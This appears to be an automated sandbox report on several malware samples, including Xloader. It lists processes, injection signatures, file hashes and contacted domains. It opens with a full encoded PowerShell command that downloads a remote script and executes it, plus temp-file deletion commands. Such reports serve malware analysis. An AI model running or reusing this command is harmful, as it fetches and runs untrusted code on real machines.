cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| N/A | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| N/A | 8.8.8.8:53 | www.speedtest.net | udp |
| N/A | 151.101.2.219:80 | www.speedtest.net | tcp |
| N/A | 151.101.2.219:443 | www.speedtest.net | tcp |
| N/A | 151.101.2.219:80 | www.speedtest.net | tcp |
| N/A | 8.8.8.8:53 | c.speedtest.net | udp |
| N/A | 151.101.2.219:443 | c.speedtest.net | tcp |
| N/A | 8.8.8.8:53 | speedtest.kabeltex.nl | udp |
| N/A | 82.151.33.2:8080 | speedtest.kabeltex.nl | tcp |
| N/A | 8.8.8.8:53 | speedtest.zeelandnet.nl | udp |
| N/A | 212.115.192.180:8080 | speedtest.zeelandnet.nl | tcp |
| N/A | 8.8.8.8:53 | speedtest.caiw.net | udp |
| N/A | 62.45.44.26:8080 | speedtest.caiw.net | tcp |
| N/A | 8.8.8.8:53 | speedtest.worldstream.nl | udp |
| N/A | 185.182.195.78:8080 | speedtest.worldstream.nl | tcp |
| N/A | 8.8.8.8:53 | pgf5ga4g4b.cn | udp |
| N/A | 206.188.196.143:443 | pgf5ga4g4b.cn | tcp |
Files
memory/3904-114-0x0000016D75910000-0x0000016D75912000-memory.dmp
memory/3904-115-0x0000016D75BE0000-0x0000016D75E8A000-memory.dmp
memory/3904-117-0x0000016D75913000-0x0000016D75915000-memory.dmp
memory/3904-118-0x0000016D75915000-0x0000016D75916000-memory.dmp
memory/3904-119-0x0000016D75916000-0x0000016D75917000-memory.dmp
memory/1200-120-0x0000000000000000-mapping.dmp
memory/1200-127-0x0000018EC5CB3000-0x0000018EC5CB5000-memory.dmp
memory/1200-126-0x0000018EC7AA0000-0x0000018EC7AA1000-memory.dmp
memory/1200-125-0x0000018EC5CB0000-0x0000018EC5CB2000-memory.dmp
memory/1200-131-0x0000018EE06D0000-0x0000018EE06D1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
memory/744-137-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\likclxcl\likclxcl.cmdline
| MD5 | a23aa39741b00f368bac9a2e2574da1d |
| SHA1 | 0d9ccc252132f44c6142e39fe0dc6b52c15abc44 |
| SHA256 | 9d9a152411fb30e8378df7825d3ca80410b2bba7a43f53f68a3888bac40bd56b |
| SHA512 | 32e0066ff846734e5769fcb4e7eda120c856d9062a76481b777f798a905c2d0af6e68301e77845373187e3b175558a3b1b76c6c8be060fe2b639ac0856043ba0 |
memory/1200-139-0x0000018EC5CB6000-0x0000018EC5CB8000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\likclxcl\likclxcl.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
memory/3988-141-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\likclxcl\CSC481DC0B26B0F48F6857BB171B79C72BC.TMP
| MD5 | 14091f6b52cce370db5e39d8806485ca |
| SHA1 | f78f3f25f42eb5a7e6df88ea26cc666bf5dd86ea |
| SHA256 | 87c98d2fce893786ebbbdd4366df6ae0c6d632917aaa4185a380ceb2e49aade9 |
| SHA512 | ac555f9dc08204e1dd11e7dc89fae520a001d840cce8bc45e9f7d17220c9ebbb6c62028050caa5a6e3df6d1ade81fb5666df5c738c71b22d5288579fc1ad0481 |
C:\Users\Admin\AppData\Local\Temp\RES403B.tmp
| MD5 | 0e6b28c99adba2f5312a9e72f20eaa09 |
| SHA1 | 4ea834bc4634e31f4785acafeef8cd04e3177ba7 |
| SHA256 | 3e1654d78e212b09e5ccd0fe3efa6970b2bb0a20b43aa801f76b83387d7f5976 |
| SHA512 | 4da3fc178e4c6c2a97221b134c9e5dc94876ddcf62f148f12596dc0851a904e9319e421b569ab65665ac3a27891a3b269bed7d5272659ad0b57ec7e06110c036 |
C:\Users\Admin\AppData\Local\Temp\likclxcl\likclxcl.dll
| MD5 | 2145a2a46033988b1223403800143e10 |
| SHA1 | b06393b4553692546176cc64bbcfef26d4b6b41a |
| SHA256 | 4d2f654f6c6e49f1f34cff72cc3420df8e38aa5081b512def8e9f58e81f3829d |
| SHA512 | eb3e62dfeff2467e6b2b9199b49362a85e8e09d3546c1290de4814b32d9ec38c486c0a8012626ce779e0e0cb27c401e44081988fb5f53eadad626c0091d5d5bf |
memory/1200-145-0x0000018EC7AF0000-0x0000018EC7AF1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 43473f4e719958639a9d89e5d8388999 |
| SHA1 | ccb79eb606a23daa4b3ff8f996a2fbf281f31491 |
| SHA256 | ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734 |
| SHA512 | 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa |
memory/1200-147-0x0000018EC5CB8000-0x0000018EC5CB9000-memory.dmp
memory/1200-152-0x0000018EE0CD0000-0x0000018EE0CD1000-memory.dmp
memory/1200-153-0x0000018EE1060000-0x0000018EE1061000-memory.dmp
memory/2756-160-0x0000000000000000-mapping.dmp
memory/2756-170-0x000001D9AE4B0000-0x000001D9AE4B2000-memory.dmp
memory/2756-171-0x000001D9AE4B3000-0x000001D9AE4B5000-memory.dmp
memory/2756-194-0x000001D9AE4B6000-0x000001D9AE4B8000-memory.dmp
memory/2276-203-0x0000000000000000-mapping.dmp
memory/2276-214-0x0000017926AF0000-0x0000017926AF2000-memory.dmp
memory/2756-213-0x000001D9AE4B8000-0x000001D9AE4BA000-memory.dmp
memory/2276-215-0x0000017926AF3000-0x0000017926AF5000-memory.dmp
memory/2320-242-0x0000000000000000-mapping.dmp
memory/2276-257-0x0000017926AF8000-0x0000017926AFA000-memory.dmp
memory/2320-258-0x000001E958170000-0x000001E958172000-memory.dmp
memory/2276-256-0x0000017926AF6000-0x0000017926AF8000-memory.dmp
memory/2320-259-0x000001E958173000-0x000001E958175000-memory.dmp
memory/2320-290-0x000001E958176000-0x000001E958178000-memory.dmp
memory/2320-291-0x000001E958178000-0x000001E95817A000-memory.dmp
memory/2164-301-0x0000000000000000-mapping.dmp
memory/3988-302-0x0000000000000000-mapping.dmp
memory/1680-303-0x0000000000000000-mapping.dmp
memory/3984-340-0x0000000000000000-mapping.dmp
memory/2200-341-0x0000000000000000-mapping.dmp
memory/4040-344-0x0000000000000000-mapping.dmp
memory/1304-345-0x0000000000000000-mapping.dmp
memory/1880-346-0x0000000000000000-mapping.dmp
memory/3600-347-0x0000000000000000-mapping.dmp
memory/2164-348-0x0000000000000000-mapping.dmp
memory/3736-349-0x0000000000000000-mapping.dmp
memory/2784-350-0x0000000000000000-mapping.dmp
memory/3964-351-0x0000000000000000-mapping.dmp
\Windows\Branding\mediasrv.png
| MD5 | 271eacd9c9ec8531912e043bc9c58a31 |
| SHA1 | c86e20c2a10fd5c5bae4910a73fd62008d41233b |
| SHA256 | 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934 |
| SHA512 | 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0 |
\Windows\Branding\mediasvc.png
| MD5 | 1fa9c1e185a51b6ed443dd782b880b0d |
| SHA1 | 50145abf336a196183882ef960d285bd77dd3490 |
| SHA256 | f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959 |
| SHA512 | 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc |
memory/3588-354-0x0000000000000000-mapping.dmp
memory/1680-355-0x0000000000000000-mapping.dmp
memory/1560-356-0x0000000000000000-mapping.dmp
memory/3136-357-0x0000000000000000-mapping.dmp
memory/2200-358-0x0000000000000000-mapping.dmp
memory/2316-359-0x0000000000000000-mapping.dmp
memory/1244-360-0x0000000000000000-mapping.dmp
memory/2352-361-0x0000000000000000-mapping.dmp
memory/3960-362-0x0000000000000000-mapping.dmp
memory/2080-363-0x0000000000000000-mapping.dmp
memory/3980-364-0x0000000000000000-mapping.dmp
memory/3424-365-0x0000000000000000-mapping.dmp
memory/2320-366-0x0000000000000000-mapping.dmp
memory/1520-367-0x0000000000000000-mapping.dmp
memory/2328-368-0x0000000000000000-mapping.dmp
memory/2104-369-0x0000000000000000-mapping.dmp
memory/2104-379-0x000001EFF02D0000-0x000001EFF02D2000-memory.dmp
memory/2104-380-0x000001EFF02D3000-0x000001EFF02D5000-memory.dmp
memory/2104-385-0x000001EFF02D6000-0x000001EFF02D8000-memory.dmp
memory/2104-435-0x000001EFF02D8000-0x000001EFF02D9000-memory.dmp
memory/3332-449-0x0000000000000000-mapping.dmp
memory/3984-450-0x0000000000000000-mapping.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
122s
Max time network
170s
Command Line
Signatures
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2024 set thread context of 1956 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2024 wrote to memory of 1956 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 2024 wrote to memory of 1956 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 2024 wrote to memory of 1956 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 2024 wrote to memory of 1956 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
| PID 2024 wrote to memory of 1956 | N/A | C:\Users\Admin\AppData\Local\Temp\Order.exe | C:\Users\Admin\AppData\Local\Temp\Order.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Order.exe
"C:\Users\Admin\AppData\Local\Temp\Order.exe"
C:\Users\Admin\AppData\Local\Temp\Order.exe
"C:\Users\Admin\AppData\Local\Temp\Order.exe"
Network
Files
memory/2024-59-0x0000000076A81000-0x0000000076A83000-memory.dmp
memory/1956-60-0x000000000040188B-mapping.dmp
memory/1956-62-0x0000000001C60000-0x0000000001C7A000-memory.dmp
memory/1956-63-0x0000000000400000-0x0000000000430000-memory.dmp
memory/1956-64-0x0000000004641000-0x0000000004642000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
56s
Max time network
44s
Command Line
Signatures
Xloader
Xloader Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1860 set thread context of 584 | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe
"C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe"
C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe
"C:\Users\Admin\AppData\Local\Temp\2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe"
Network
Files
memory/1860-60-0x0000000000A70000-0x0000000000A71000-memory.dmp
memory/1860-62-0x0000000004C80000-0x0000000004C81000-memory.dmp
memory/1860-63-0x0000000000970000-0x000000000098B000-memory.dmp
memory/1860-64-0x0000000007F80000-0x0000000007FF3000-memory.dmp
memory/1860-65-0x0000000004BE0000-0x0000000004C0E000-memory.dmp
memory/584-67-0x000000000041D020-mapping.dmp
memory/584-66-0x0000000000400000-0x0000000000428000-memory.dmp
memory/584-68-0x0000000000B60000-0x0000000000E63000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:32
Platform
win10v20210410
Max time kernel
14s
Max time network
118s
Command Line
Signatures
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\39c1e12e0ada85fa835b623a4698345bf95372bea57a7d3a5070ea1d5d5d825c.js
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:30
Platform
debian9-mipsel
Max time kernel
0s
Max time network
25s
Command Line
Signatures
Processes
./53074094addc55786936f3d67d7fe36554a7c4f4f96c06252ae768707295dbec
[./53074094addc55786936f3d67d7fe36554a7c4f4f96c06252ae768707295dbec]
Network
| Country | Destination | Domain | Proto |
| N/A | 1.1.1.1:53 | 2.debian.pool.ntp.org | udp |
| N/A | 1.1.1.1:53 | 2.debian.pool.ntp.org | udp |
| N/A | 5.200.6.34:123 | 2.debian.pool.ntp.org | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2021-07-30 15:25
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
148s
Max time network
193s
Command Line
Signatures
Xloader
Xloader Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1908 set thread context of 672 | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
| PID 672 set thread context of 1288 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 672 set thread context of 1288 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | C:\Windows\Explorer.EXE |
| PID 1032 set thread context of 1288 | N/A | C:\Windows\SysWOW64\cmmon32.exe | C:\Windows\Explorer.EXE |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\USD $.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\cmmon32.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\USD $.exe
"C:\Users\Admin\AppData\Local\Temp\USD $.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"{path}"
C:\Windows\SysWOW64\cmmon32.exe
"C:\Windows\SysWOW64\cmmon32.exe"
C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | www.kathyharvey.com | udp |
| N/A | 52.58.78.16:80 | www.kathyharvey.com | tcp |
| N/A | 8.8.8.8:53 | www.panyu-qqbaby.com | udp |
| N/A | 107.160.109.196:80 | www.panyu-qqbaby.com | tcp |
| N/A | 8.8.8.8:53 | www.facebookipl.com | udp |
| N/A | 34.102.136.180:80 | www.facebookipl.com | tcp |
| N/A | 8.8.8.8:53 | www.visualartcr.com | udp |
| N/A | 74.220.199.68:80 | www.visualartcr.com | tcp |
| N/A | 8.8.8.8:53 | www.warrenswindowcleans.co.uk | udp |
| N/A | 85.233.160.22:80 | www.warrenswindowcleans.co.uk | tcp |
| N/A | 8.8.8.8:53 | www.centerevents.net | udp |
| N/A | 8.8.8.8:53 | www.trinspinsgreen.com | udp |
| N/A | 8.8.8.8:53 | www.thefucktardmanual.com | udp |
| N/A | 192.0.78.24:80 | www.thefucktardmanual.com | tcp |
| N/A | 8.8.8.8:53 | www.arodsr.com | udp |
| N/A | 66.235.200.146:80 | www.arodsr.com | tcp |
| N/A | 8.8.8.8:53 | www.tincanphones.com | udp |
| N/A | 3.136.2.34:80 | www.tincanphones.com | tcp |
| N/A | 8.8.8.8:53 | www.regarta.com | udp |
| N/A | 173.239.8.164:80 | www.regarta.com | tcp |
| N/A | 8.8.8.8:53 | www.sdmdwang.com | udp |
| N/A | 112.213.96.11:80 | www.sdmdwang.com | tcp |
| N/A | 8.8.8.8:53 | www.sdmdwang.com | udp |
| N/A | 112.213.96.11:80 | www.sdmdwang.com | tcp |
| N/A | 8.8.8.8:53 | www.experienceddoctor.com | udp |
| N/A | 207.148.248.143:80 | www.experienceddoctor.com | tcp |
Files
memory/1908-60-0x0000000000AD0000-0x0000000000AD1000-memory.dmp
memory/1908-62-0x00000000071F0000-0x00000000071F1000-memory.dmp
memory/1908-63-0x00000000002C0000-0x00000000002C2000-memory.dmp
memory/1908-64-0x0000000007490000-0x0000000007516000-memory.dmp
memory/1908-65-0x0000000000710000-0x0000000000746000-memory.dmp
memory/672-66-0x0000000000400000-0x0000000000428000-memory.dmp
memory/672-67-0x000000000041D000-mapping.dmp
memory/672-68-0x0000000000AD0000-0x0000000000DD3000-memory.dmp
memory/672-69-0x00000000001C0000-0x00000000001D0000-memory.dmp
memory/1288-70-0x0000000004A20000-0x0000000004B4C000-memory.dmp
memory/672-71-0x00000000002B0000-0x00000000002C0000-memory.dmp
memory/1288-72-0x0000000006AE0000-0x0000000006BB7000-memory.dmp
memory/1032-73-0x0000000000000000-mapping.dmp
memory/1484-74-0x0000000000000000-mapping.dmp
memory/1032-76-0x0000000000080000-0x00000000000A8000-memory.dmp
memory/1032-77-0x0000000001F80000-0x0000000002283000-memory.dmp
memory/1032-75-0x00000000005F0000-0x00000000005FD000-memory.dmp
memory/1032-78-0x0000000000680000-0x000000000070F000-memory.dmp
memory/1288-79-0x0000000007090000-0x00000000071DE000-memory.dmp
memory/1032-80-0x0000000074FB1000-0x0000000074FB3000-memory.dmp